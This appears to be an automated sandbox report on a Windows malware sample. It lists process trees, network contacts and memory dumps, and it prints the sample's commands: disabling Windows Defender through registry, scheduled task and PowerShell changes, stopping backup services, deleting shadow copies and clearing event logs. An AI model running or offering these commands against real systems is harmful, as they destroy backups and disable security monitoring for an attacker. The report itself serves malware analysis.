PID 3440 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3240 wrote to memory of 3828 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3240 wrote to memory of 3828 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3240 wrote to memory of 3828 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4292 wrote to memory of 3112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4292 wrote to memory of 3112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4292 wrote to memory of 3112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4044 wrote to memory of 680 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4044 wrote to memory of 680 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4044 wrote to memory of 680 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_12e93" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12e93" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_12e93" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.12.18:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp
DE 23.51.123.27:80 tcp
DE 23.51.123.27:80 tcp

Files

memory/3052-118-0x0000000000000000-mapping.dmp

memory/3212-119-0x0000000000000000-mapping.dmp

memory/4088-120-0x0000000000000000-mapping.dmp

memory/4000-121-0x0000000000000000-mapping.dmp

memory/4312-122-0x0000000000000000-mapping.dmp

memory/4260-123-0x0000000000000000-mapping.dmp

memory/4232-124-0x0000000000000000-mapping.dmp

memory/4368-125-0x0000000000000000-mapping.dmp

memory/4416-126-0x0000000000000000-mapping.dmp

memory/4348-127-0x0000000000000000-mapping.dmp

memory/4308-128-0x0000000000000000-mapping.dmp

memory/4392-129-0x0000000000000000-mapping.dmp

memory/3240-130-0x0000000000000000-mapping.dmp

memory/3828-131-0x0000000000000000-mapping.dmp

memory/4292-132-0x0000000000000000-mapping.dmp

memory/3112-133-0x0000000000000000-mapping.dmp

memory/4044-134-0x0000000000000000-mapping.dmp

memory/680-135-0x0000000000000000-mapping.dmp

memory/836-136-0x0000000000000000-mapping.dmp

memory/3824-137-0x0000000000000000-mapping.dmp

memory/1072-138-0x0000000000000000-mapping.dmp

memory/1284-139-0x0000000000000000-mapping.dmp

memory/1504-140-0x0000000000000000-mapping.dmp

memory/1708-141-0x0000000000000000-mapping.dmp

memory/1996-142-0x0000000000000000-mapping.dmp

memory/2368-143-0x0000000000000000-mapping.dmp

memory/2548-144-0x0000000000000000-mapping.dmp

memory/2776-145-0x0000000000000000-mapping.dmp

memory/2912-146-0x0000000000000000-mapping.dmp

memory/4536-147-0x0000000000000000-mapping.dmp

memory/4756-148-0x0000000000000000-mapping.dmp

memory/4840-149-0x0000000000000000-mapping.dmp

memory/4880-150-0x0000000000000000-mapping.dmp

memory/4976-151-0x0000000000000000-mapping.dmp

memory/1968-152-0x0000000000000000-mapping.dmp

memory/3608-153-0x0000000000000000-mapping.dmp

memory/4856-154-0x0000000000000000-mapping.dmp

memory/4568-155-0x0000000000000000-mapping.dmp

memory/4900-156-0x0000000000000000-mapping.dmp

memory/5088-157-0x0000000000000000-mapping.dmp

memory/4508-158-0x0000000000000000-mapping.dmp

memory/608-159-0x0000000000000000-mapping.dmp

memory/1160-160-0x0000000000000000-mapping.dmp

memory/4620-161-0x0000000000000000-mapping.dmp

memory/5040-162-0x0000000000000000-mapping.dmp

memory/4496-163-0x0000000000000000-mapping.dmp

memory/1320-164-0x0000000000000000-mapping.dmp

memory/2340-165-0x0000000000000000-mapping.dmp

memory/1944-166-0x0000000000000000-mapping.dmp

memory/1924-167-0x0000000000000000-mapping.dmp

memory/4488-168-0x0000000000000000-mapping.dmp

memory/3208-169-0x0000000000000000-mapping.dmp

memory/2976-170-0x0000000000000000-mapping.dmp

memory/2236-171-0x0000000000000000-mapping.dmp

memory/916-172-0x0000000000000000-mapping.dmp

memory/1468-173-0x0000000000000000-mapping.dmp

memory/2084-174-0x0000000000000000-mapping.dmp

memory/3696-175-0x0000000000000000-mapping.dmp

memory/3296-176-0x0000000000000000-mapping.dmp

memory/3252-177-0x0000000000000000-mapping.dmp

memory/5100-178-0x0000000000000000-mapping.dmp

memory/2576-179-0x0000000000000000-mapping.dmp

memory/4060-180-0x0000000000000000-mapping.dmp

memory/4004-181-0x0000000000000000-mapping.dmp

memory/4456-183-0x00000000031B0000-0x00000000031B1000-memory.dmp

memory/4456-182-0x00000000031B0000-0x00000000031B1000-memory.dmp

memory/4456-184-0x0000000004A60000-0x0000000004A96000-memory.dmp

memory/4456-185-0x0000000004B10000-0x0000000004B11000-memory.dmp

memory/4456-186-0x00000000074B0000-0x0000000007AD8000-memory.dmp

memory/4456-187-0x0000000007B10000-0x0000000007B32000-memory.dmp

memory/4456-188-0x0000000007D90000-0x0000000007DF6000-memory.dmp

memory/4456-189-0x0000000004B12000-0x0000000004B13000-memory.dmp

memory/4456-190-0x0000000007D20000-0x0000000007D86000-memory.dmp

memory/4456-191-0x0000000007E20000-0x0000000008170000-memory.dmp

memory/4456-192-0x0000000008260000-0x000000000827C000-memory.dmp

memory/4456-193-0x0000000008470000-0x00000000084BB000-memory.dmp

memory/4456-194-0x00000000085C0000-0x0000000008636000-memory.dmp

memory/4456-195-0x00000000031B0000-0x00000000031B1000-memory.dmp

memory/4456-203-0x00000000074B0000-0x0000000007AD8000-memory.dmp

memory/4456-204-0x0000000009630000-0x0000000009663000-memory.dmp

memory/4456-205-0x0000000009630000-0x0000000009663000-memory.dmp

memory/4456-207-0x0000000007D90000-0x0000000007DF6000-memory.dmp

memory/4456-206-0x0000000007B10000-0x0000000007B32000-memory.dmp

memory/4456-208-0x0000000007D20000-0x0000000007D86000-memory.dmp

memory/4456-209-0x0000000008470000-0x00000000084BB000-memory.dmp

memory/4456-210-0x00000000085C0000-0x0000000008636000-memory.dmp

memory/4456-211-0x0000000009410000-0x000000000942E000-memory.dmp

memory/4456-216-0x000000007E470000-0x000000007E471000-memory.dmp

memory/4456-217-0x0000000009760000-0x0000000009805000-memory.dmp

memory/4456-218-0x0000000009940000-0x00000000099D4000-memory.dmp

memory/4456-219-0x0000000004B13000-0x0000000004B14000-memory.dmp

memory/4456-412-0x0000000009840000-0x000000000985A000-memory.dmp

memory/4456-417-0x0000000009840000-0x000000000985A000-memory.dmp

memory/4456-418-0x0000000009830000-0x0000000009838000-memory.dmp

memory/4456-423-0x0000000009830000-0x0000000009838000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/3732-436-0x0000000004640000-0x0000000004676000-memory.dmp

memory/3732-437-0x00000000071A0000-0x00000000077C8000-memory.dmp

memory/3732-438-0x00000000070B0000-0x00000000070D2000-memory.dmp

memory/3732-439-0x0000000006B60000-0x0000000006B61000-memory.dmp

memory/3732-440-0x0000000006B62000-0x0000000006B63000-memory.dmp

memory/3732-441-0x00000000079B0000-0x0000000007A16000-memory.dmp

memory/3732-442-0x0000000007AC0000-0x0000000007B26000-memory.dmp

memory/3732-443-0x0000000007B30000-0x0000000007E80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8097d49901b71411d15be41092f78910
SHA1 0c9fe4109d6f9036d6997002b24b278d527366f1
SHA256 014c3687a7fea07bcac7957422669c962cfb26b5778023436b08133016a52000
SHA512 0d273a20ad8de87091c445afaa8476668778ca105422d2b6341151cea9cdbea43dbd24b4637eaaabe74b171f61ae4a4b4dc941bb47d51e71ef355e4f7c16c922

memory/3732-445-0x0000000007EE0000-0x0000000007EFC000-memory.dmp

memory/3732-446-0x0000000007F20000-0x0000000007F6B000-memory.dmp

memory/3732-447-0x0000000008300000-0x0000000008376000-memory.dmp

memory/3732-456-0x00000000071A0000-0x00000000077C8000-memory.dmp

memory/3732-457-0x00000000092C0000-0x00000000092F3000-memory.dmp

memory/3732-464-0x0000000008300000-0x0000000008376000-memory.dmp

memory/3732-465-0x00000000092A0000-0x00000000092BE000-memory.dmp

memory/3732-463-0x0000000007F20000-0x0000000007F6B000-memory.dmp

memory/3732-462-0x0000000007AC0000-0x0000000007B26000-memory.dmp

memory/3732-461-0x00000000079B0000-0x0000000007A16000-memory.dmp

memory/3732-460-0x00000000070B0000-0x00000000070D2000-memory.dmp

memory/3732-459-0x000000007F050000-0x000000007F051000-memory.dmp

memory/3732-458-0x00000000092C0000-0x00000000092F3000-memory.dmp

memory/3732-470-0x0000000009310000-0x00000000093B5000-memory.dmp

memory/3732-471-0x00000000095B0000-0x0000000009644000-memory.dmp

memory/3732-540-0x0000000006B63000-0x0000000006B64000-memory.dmp

memory/3732-665-0x0000000009580000-0x000000000959A000-memory.dmp

memory/3732-670-0x0000000009580000-0x000000000959A000-memory.dmp

memory/3732-671-0x0000000009570000-0x0000000009578000-memory.dmp

memory/3732-676-0x0000000009570000-0x0000000009578000-memory.dmp